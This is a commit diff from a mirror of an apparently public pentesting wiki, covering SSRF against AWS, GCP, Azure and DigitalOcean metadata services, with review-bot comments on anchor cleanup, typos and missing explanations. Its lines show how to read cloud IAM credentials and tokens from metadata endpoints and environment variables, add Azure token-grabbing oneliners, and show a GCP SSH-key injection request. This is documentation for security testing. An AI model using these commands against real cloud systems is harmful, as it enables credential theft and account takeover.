mirror of https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00

aa ssrf

parent 10c0f3e054
commit 21283c5644
				| @ -111,7 +111,7 @@ curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null | | |||||||
| > [!NOTE] | > [!NOTE] | ||||||
| > Note that in **some cases** you will be able to access the **EC2 metadata instance** from the container (check IMDSv2 TTL limitations mentioned previously). In these scenarios from the container you could access both the container IAM role and the EC2 IAM role. | > Note that in **some cases** you will be able to access the **EC2 metadata instance** from the container (check IMDSv2 TTL limitations mentioned previously). In these scenarios from the container you could access both the container IAM role and the EC2 IAM role. | ||||||
| 
 | 
 | ||||||
| ### SSRF for AWS Lambda <a href="#id-6f97" id="id-6f97"></a> | ### SSRF for AWS Lambda | ||||||
| 
 | 
 | ||||||
| In this case the **credentials are stored in env variables**. So, to access them you need to access something like **`file:///proc/self/environ`**. | In this case the **credentials are stored in env variables**. So, to access them you need to access something like **`file:///proc/self/environ`**. | ||||||
| 
 | 
 | ||||||
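Review bot: dropping the `<a href="#id-6f97" id="id-6f97"></a>` anchor from the `### SSRF for AWS Lambda` heading is correct, and the reason is worth recording: the same `id-6f97` is also attached to the `### SSRF URL for AWS Elastic Beanstalk` heading in the next hunk, so the id was a duplicate (HTML ids must be unique) and links to `#id-6f97` were already ambiguous. The commit message `aa ssrf` does not say this; suggest stating that these are legacy per-heading anchors being removed across the page, and that inbound `#id-…` links now have to target the renderer's own heading slugs.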
| @ -126,7 +126,7 @@ Moreover, in addition to IAM credentials, Lambda functions also have **event dat | |||||||
| > [!WARNING] | > [!WARNING] | ||||||
| > Note that **lambda credentials** are inside the **env variables**. So if the **stack trace** of the lambda code prints env vars, it's possible to **exfiltrate them provoking an error** in the app. | > Note that **lambda credentials** are inside the **env variables**. So if the **stack trace** of the lambda code prints env vars, it's possible to **exfiltrate them provoking an error** in the app. | ||||||
| 
 | 
 | ||||||
| ### SSRF URL for AWS Elastic Beanstalk <a href="#id-6f97" id="id-6f97"></a> | ### SSRF URL for AWS Elastic Beanstalk | ||||||
| 
 | 
 | ||||||
| We retrieve the `accountId` and `region` from the API. | We retrieve the `accountId` and `region` from the API. | ||||||
| 
 | 
 | ||||||
| @ -145,11 +145,11 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean | |||||||
| 
 | 
 | ||||||
| Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`. | Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`. | ||||||
| 
 | 
 | ||||||
| ## GCP <a href="#id-6440" id="id-6440"></a> | ## GCP | ||||||
| 
 | 
 | ||||||
| You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata). | You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata). | ||||||
| 
 | 
 | ||||||
| ### SSRF URL for Google Cloud <a href="#id-6440" id="id-6440"></a> | ### SSRF URL for Google Cloud | ||||||
| 
 | 
 | ||||||
| Requires the HTTP header **`Metadata-Flavor: Google`** and you can access the metadata endpoint in with the following URLs: | Requires the HTTP header **`Metadata-Flavor: Google`** and you can access the metadata endpoint in with the following URLs: | ||||||
| 
 | 
 | ||||||
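Review bot: `## GCP` and `### SSRF URL for Google Cloud` both carried `id-6440`, so removing the two anchors here also fixes an invalid duplicate id; fine. Nit in the unchanged Elastic Beanstalk context at the top of this hunk: the text says the `region` is retrieved from the API, but the example then hardcodes `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`. Suggest `s3://elasticbeanstalk-[REGION]-[ACCOUNT_ID]/` so the retrieved region is actually used and the example is not tied to us-east-2.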
| @ -260,7 +260,7 @@ http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true | |||||||
| > gcloud config unset auth/access_token_file | > gcloud config unset auth/access_token_file | ||||||
| > ``` | > ``` | ||||||
| 
 | 
 | ||||||
| ### Add an SSH key <a href="#id-3e24" id="id-3e24"></a> | ### Add an SSH key | ||||||
| 
 | 
 | ||||||
| Extract the token | Extract the token | ||||||
| 
 | 
 | ||||||
| @ -289,7 +289,7 @@ curl -X POST "https://www.googleapis.com/compute/v1/projects/1042377752888/setCo | |||||||
| --data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}' | --data '{"items": [{"key": "sshkeyname", "value": "sshkeyvalue"}]}' | ||||||
| ``` | ``` | ||||||
| 
 | 
 | ||||||
| ### Cloud Functions <a href="#id-9f1f" id="id-9f1f"></a> | ### Cloud Functions | ||||||
| 
 | 
 | ||||||
| The metadata endpoint works the same as in VMs but without some endpoints: | The metadata endpoint works the same as in VMs but without some endpoints: | ||||||
| 
 | 
 | ||||||
| @ -318,7 +318,7 @@ for sa in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMeta | |||||||
| done | done | ||||||
| ``` | ``` | ||||||
| 
 | 
 | ||||||
| ## Digital Ocean <a href="#id-9f1f" id="id-9f1f"></a> | ## Digital Ocean | ||||||
| 
 | 
 | ||||||
| > [!WARNING] | > [!WARNING] | ||||||
| > There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials | > There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials | ||||||
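Review bot: `## Digital Ocean` reused `id-9f1f` from the `### Cloud Functions` heading in the previous hunk, so removing it here is needed, not just cosmetic. While touching this section, the unchanged warning line reads `There isn't things like AWS Roles or GCP service account, so don't expect to find metadata bot credentials`; suggest `There is nothing like AWS roles or GCP service accounts, so don't expect to find credentials in the metadata`, which is what the sentence is trying to say.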
| @ -337,7 +337,7 @@ http://169.254.169.254/metadata/v1/interfaces/public/0/ipv6/addressAll in one re | |||||||
| curl http://169.254.169.254/metadata/v1.json | jq | curl http://169.254.169.254/metadata/v1.json | jq | ||||||
| ``` | ``` | ||||||
| 
 | 
 | ||||||
| ## Azure <a href="#cea8" id="cea8"></a> | ## Azure | ||||||
| 
 | 
 | ||||||
| ### Azure VM | ### Azure VM | ||||||
| 
 | 
 | ||||||
| @ -442,7 +442,7 @@ $userData = Invoke- RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "h | |||||||
| {{#endtab}} | {{#endtab}} | ||||||
| {{#endtabs}} | {{#endtabs}} | ||||||
| 
 | 
 | ||||||
| ### Azure App & Functions Services | ### Azure App & Functions Services & Automation Accounts | ||||||
| 
 | 
 | ||||||
| From the **env** you can get the values of **`IDENTITY_HEADER`** and **`IDENTITY_ENDPOINT`**. That you can use to gather a token to speak with the metadata server. | From the **env** you can get the values of **`IDENTITY_HEADER`** and **`IDENTITY_ENDPOINT`**. That you can use to gather a token to speak with the metadata server. | ||||||
| 
 | 
 | ||||||
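Review bot: the heading grows to `### Azure App & Functions Services & Automation Accounts`, but the paragraph under it is untouched and still only explains that `IDENTITY_HEADER` and `IDENTITY_ENDPOINT` come from the env of the app. Add one sentence saying what the Automation Accounts case is (the same `IDENTITY_ENDPOINT` / `X-IDENTITY-HEADER` token request, which is what the oneliners added in the next hunk rely on, and that the values are read from inside a runbook rather than via SSRF into an app); otherwise the heading change has no supporting text.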
| @ -519,57 +519,28 @@ $storageToken = Get-Token -Resource "https://storage.azure.com/" | |||||||
| Write-Host "Storage Token: $storageToken" | Write-Host "Storage Token: $storageToken" | ||||||
| 
 | 
 | ||||||
| 
 | 
 | ||||||
|  | # Using oneliners | ||||||
| 
 | 
 | ||||||
|  | ## Get management token | ||||||
|  | (Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://management.azure.com/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token | ||||||
| 
 | 
 | ||||||
|  | ## Get graph token | ||||||
|  | (Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://graph.microsoft.com/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token | ||||||
| 
 | 
 | ||||||
|  | ## Get vault token | ||||||
|  | (Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://vault.azure.net/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token | ||||||
| 
 | 
 | ||||||
|  | ## Get storage token | ||||||
|  | (Invoke-RestMethod -Uri "${env:IDENTITY_ENDPOINT}?resource=https://storage.azure.com/&api-version=2019-08-01" -Headers @{ "X-IDENTITY-HEADER" = "$env:IDENTITY_HEADER" }).access_token | ||||||
| 
 | 
 | ||||||
| 
 | ## Remember that in Automation Accounts it might be declared the client ID of the assigned user managed identity inside the variable that can be gatehred with: | ||||||
| # API request in powershell to management endpoint | Get-AutomationVariable -Name 'AUTOMATION_SC_USER_ASSIGNED_IDENTITY_ID' | ||||||
| $Token = 'eyJ0eX..' |  | ||||||
| $URI='https://management.azure.com/subscriptions?api-version=2020-01-01' |  | ||||||
| $RequestParams = @{ |  | ||||||
|  Method = 'GET' |  | ||||||
|  Uri = $URI |  | ||||||
|  Headers = @{ |  | ||||||
|   'Authorization' = "Bearer $Token" |  | ||||||
|  } |  | ||||||
| } |  | ||||||
| (Invoke-RestMethod @RequestParams).value |  | ||||||
| 
 |  | ||||||
| # API request to graph endpoint (get enterprise applications) |  | ||||||
| $Token = 'eyJ0eX..' |  | ||||||
| $URI = 'https://graph.microsoft.com/v1.0/applications' |  | ||||||
| $RequestParams = @{ |  | ||||||
|  Method = 'GET' |  | ||||||
|  Uri = $URI |  | ||||||
|  Headers = @{ |  | ||||||
|  'Authorization' = "Bearer $Token" |  | ||||||
|  } |  | ||||||
| } |  | ||||||
| (Invoke-RestMethod @RequestParams).value |  | ||||||
| 
 |  | ||||||
| # Using AzureAD Powershell module witho both management and graph tokens |  | ||||||
| $token = 'eyJ0e..' |  | ||||||
| $graphaccesstoken = 'eyJ0eX..' |  | ||||||
| Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId 2e91a4f12984-46ee-2736-e32ff2039abc |  | ||||||
| 
 |  | ||||||
| # Try to get current perms over resources |  | ||||||
| Get-AzResource |  | ||||||
| ## The following error means that the user doesn't have permissions over any resource |  | ||||||
| Get-AzResource : 'this.Client.SubscriptionId' cannot be null. |  | ||||||
| At line:1 char:1 |  | ||||||
| + Get-AzResource |  | ||||||
| + ~~~~~~~~~~~~~~ |  | ||||||
|  + CategoryInfo : CloseError: (:) [Get-AzResource],ValidationException |  | ||||||
|  + FullyQualifiedErrorId : |  | ||||||
| Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet |  | ||||||
| ``` | ``` | ||||||
| 
 | 
 | ||||||
| {{#endtab}} | {{#endtab}} | ||||||
| {{#endtabs}} | {{#endtabs}} | ||||||
| 
 | 
 | ||||||
| ## IBM Cloud <a href="#id-2af0" id="id-2af0"></a> | ## IBM Cloud | ||||||
| 
 | 
 | ||||||
| > [!WARNING] | > [!WARNING] | ||||||
| > Note that in IBM by default metadata is not enabled, so it's possible that you won't be able to access it even if you are inside an IBM cloud VM | > Note that in IBM by default metadata is not enabled, so it's possible that you won't be able to access it even if you are inside an IBM cloud VM | ||||||
|  | |||||||
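Review bot: the added line `Get-AutomationVariable -Name 'AUTOMATION_SC_USER_ASSIGNED_IDENTITY_ID'` retrieves the client ID of the user-assigned identity, but none of the new oneliners use it: they all request `${env:IDENTITY_ENDPOINT}?resource=...&api-version=2019-08-01` with only the `X-IDENTITY-HEADER` header, which is the system-assigned identity request. For a user-assigned identity the request has to name the identity (on the App Service / Functions identity endpoint that is a `client_id` query parameter), so suggest one more oneliner that captures the variable into `$clientId` and appends `&client_id=$clientId`, or the comment above it should say why the ID is fetched. Typo in the same comment: `gatehred` should be `gathered`, and `it might be declared the client ID ... inside the variable` reads better as `the client ID of the assigned user-managed identity may be stored in a variable`. Separately, this hunk deletes the `Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId ...` block and the `Get-AzResource` / `'this.Client.SubscriptionId' cannot be null` interpretation without relocating them anywhere in this diff; that was the only part of the section showing how to use the tokens once obtained and how to read a no-permissions result, so either restore it below the oneliners or say in the commit message that it was dropped on purpose.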